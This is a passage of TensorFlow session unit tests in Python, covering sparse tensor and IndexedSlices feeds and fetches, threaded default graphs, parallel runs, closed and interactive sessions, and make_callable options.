a = constant_op.constant(1.0, shape=[1, 2])
v = variables.Variable(a, name='testFetchOperationObject_v')
s.run(v.initializer)
v_val = s.run(v)
self.assertAllEqual([[1.0, 1.0]], v_val)
def testFetchSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
constant_op.constant(indices), constant_op.constant(values),
constant_op.constant(shape))
# Single fetch, use as tuple
sp_out = s.run(sp)
indices_out, values_out, shape_out = sp_out
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Single fetch, use as SparseTensorValue
sp_out = s.run(sp)
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Tuple fetch, use as tuple
indices_out, values_out, shape_out = s.run(sp)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as tuple
(indices_out, values_out, shape_out), = s.run([sp])
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# List fetch, use as SparseTensorValue
sp_out, = s.run([sp])
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Dict fetch (single value), use as tuple
indices_out, values_out, shape_out = s.run({'sp': sp})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch (list value), use as tuple
(indices_out, values_out, shape_out), = s.run({'sp': [sp]})['sp']
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Dict fetch, use as SparseTensorValue
sp_out = s.run({'sp': sp})['sp']
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Nested list fetch use as tuple
sp_out = s.run([[[sp]], sp])
indices_out, values_out, shape_out = sp_out[0][0][0]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
indices_out, values_out, shape_out = sp_out[1]
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Nested list fetch, use as SparseTensorValue
sp_out = s.run([[[sp]], sp])
self.assertAllEqual(sp_out[0][0][0].indices, indices)
self.assertAllEqual(sp_out[0][0][0].values, values)
self.assertAllEqual(sp_out[0][0][0].dense_shape, shape)
self.assertAllEqual(sp_out[1].indices, indices)
self.assertAllEqual(sp_out[1].values, values)
self.assertAllEqual(sp_out[1].dense_shape, shape)
def testFeedSparseTensor(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = sparse_tensor.SparseTensor(
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with tuple, fetch sp directly
sp_out = s.run(sp, {sp: (indices, values, shape)})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
# Feed SparseTensorValue and fetch sp directly.
sp_out = s.run(sp, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp_out.indices, indices)
self.assertAllEqual(sp_out.values, values)
self.assertAllEqual(sp_out.dense_shape, shape)
def testFeedSparsePlaceholder(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderPartialShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
shape=[None, 9, 2], dtype=np.float32, name='placeholder1')
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
sp2 = sparse_tensor.SparseTensor(sp_indices, sp_values, sp_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
# Feed with SparseTensorValue, fetch SparseTensorValue
sp2_out = s.run(sp2, {
sp: sparse_tensor.SparseTensorValue(indices, values, shape)
})
self.assertAllEqual(sp2_out.indices, indices)
self.assertAllEqual(sp2_out.values, values)
self.assertAllEqual(sp2_out.dense_shape, shape)
def testFeedSparsePlaceholderConstantShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(
dtype=np.float32, shape=shape, name='placeholder1')
self.assertAllEqual(sp.dense_shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.dense_shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {
sp: (indices, values)
})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)),
array_ops.placeholder(dtype=np.int64, shape=(3,)),
)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: (values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32, shape=(2,)),
array_ops.placeholder(dtype=np.int64, shape=(2, 3)), None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: (values, indices)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run([ind_values, ind_indices], {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {
ind: ops.IndexedSlicesValue(values, indices, dense_shape)
})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
@test_util.run_v1_only('b/120545219')
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
@test_util.run_v1_only('b/120545219')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
@test_util.run_v1_only('b/120545219')
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEqual(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEqual(len(sess.graph_def.node), 2)
self.assertAllEqual(c, 5.0)
self.assertAllEqual(d, 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEqual(len(sess.graph_def.node), 3)
self.assertAllEqual(e, 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run({})
@test_util.run_v1_only('b/120545219')
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
@test_util.run_v1_only('b/120545219')
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e)
sess.close()
@test_util.run_v1_only('b/120545219')
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
@test_util.run_v1_only('b/120545219')
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
@test_util.run_v1_only('b/120545219')
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
          elif dtype == dtypes.complex128:
            np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
